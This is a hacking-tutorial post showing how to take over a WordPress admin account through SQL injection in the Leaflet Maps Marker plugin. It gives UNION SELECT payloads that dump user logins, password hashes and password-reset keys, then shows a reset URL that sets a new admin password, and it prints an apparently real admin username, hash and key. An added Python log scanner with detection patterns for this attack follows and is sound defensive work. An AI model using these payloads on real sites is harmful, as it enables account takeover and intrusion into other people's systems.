Today I'll show you how to inject WordPress and get into the admin panel in seconds.
Let's say we have this vulnerable site:
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1
And let's say we extracted the number of columns and the admin data [user and password] by SQLi:
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=0x00),(select (@) from (wp_users) where (@) in (@:=concat(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --
admin login : michelsenweb
admin password : $P$BPXdeAk4qo6ndqQWUJfuRkMOCqi.bJ0
Now, this password is difficult to crack.
OK, now I will show you an easy way to log in to the admin panel.
First we go to the admin panel and press "Lost your password?"
PHP Code:
www.site.com/wp-login.php
Now we put in the admin user we found by injection: michelsenweb.
like this
Now, we don't have the admin's mail to receive the link for creating a new password, or to get the activation key.
OK, see what I will do!
Now we will extract the user_activation_key by injection; we will use it to create a new password.
PHP Code:
www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users
Now we have the user_activation_key for this admin user: michelsenweb
michelsenweb:ADpMtuhLWYbPSubvKwgx
Now we will use this query to create a new password:
PHP Code:
www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login
Replace user_activation_key with ADpMtuhLWYbPSubvKwgx
Replace user_login with michelsenweb
Like this:
PHP Code:
www.site.com/wp-login.php?action=rp&key=ADpMtuhLWYbPSubvKwgx&login=michelsenweb
Now we get this page to create a new password. After we enter the new password, press Reset password.
OK, let's try to log in to the admin panel with our new password.
Aha, we are now in the admin panel, and now we can spawn a shell.
Hope you learned something......
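Seen from the defender's side, the request sequence in this walkthrough leaves a distinctive trail in the web server's access log: SQL keywords in the plugin's query string, followed by password-reset requests to wp-login.php from the same client. The following is an added example, not part of the original post. It scans Combined Log Format lines for that pattern; the log lines, keys, IP addresses and the `scan` function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus, parse_qs

# Combined Log Format: ip - - [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# SQL markers of the kind used in the query strings above (matched after URL-decoding).
SQLI_RE = re.compile(
    r'union\s+(all\s+)?select|\bwp_users\b|user_activation_key|user_pass',
    re.IGNORECASE)
RESET_ACTIONS = ("lostpassword", "rp", "resetpass")

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2014:10:00:01 +0000] "GET /wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Mar/2014:10:02:11 +0000] "GET /wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1%20UNION%20SELECT%201,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7%20FROM%20wp_users HTTP/1.1" 200 6033
203.0.113.9 - - [10/Mar/2014:10:02:40 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2014:10:03:05 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY&login=admin HTTP/1.1" 200 2890
198.51.100.7 - - [10/Mar/2014:10:05:00 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY2&login=editor HTTP/1.1" 200 2890
"""

def scan(log_text):
    """Return (line_no, ip, rule) alerts for SQLi probes and the resets that follow them."""
    alerts, sqli_sources = [], set()
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, _ts, _method, target, _status = m.groups()
        url = urlsplit(target)
        query = unquote_plus(url.query)  # decode %20 and + before matching
        if SQLI_RE.search(query):
            sqli_sources.add(ip)
            alerts.append((n, ip, "sqli-in-query"))
        elif url.path.endswith("/wp-login.php") and ip in sqli_sources:
            # A reset from a client that just sent SQLi is far more suspicious
            # than a reset on its own (line 5 of the sample is not flagged).
            action = parse_qs(url.query).get("action", [""])[0]
            if action in RESET_ACTIONS:
                alerts.append((n, ip, "password-reset-after-sqli:" + action))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```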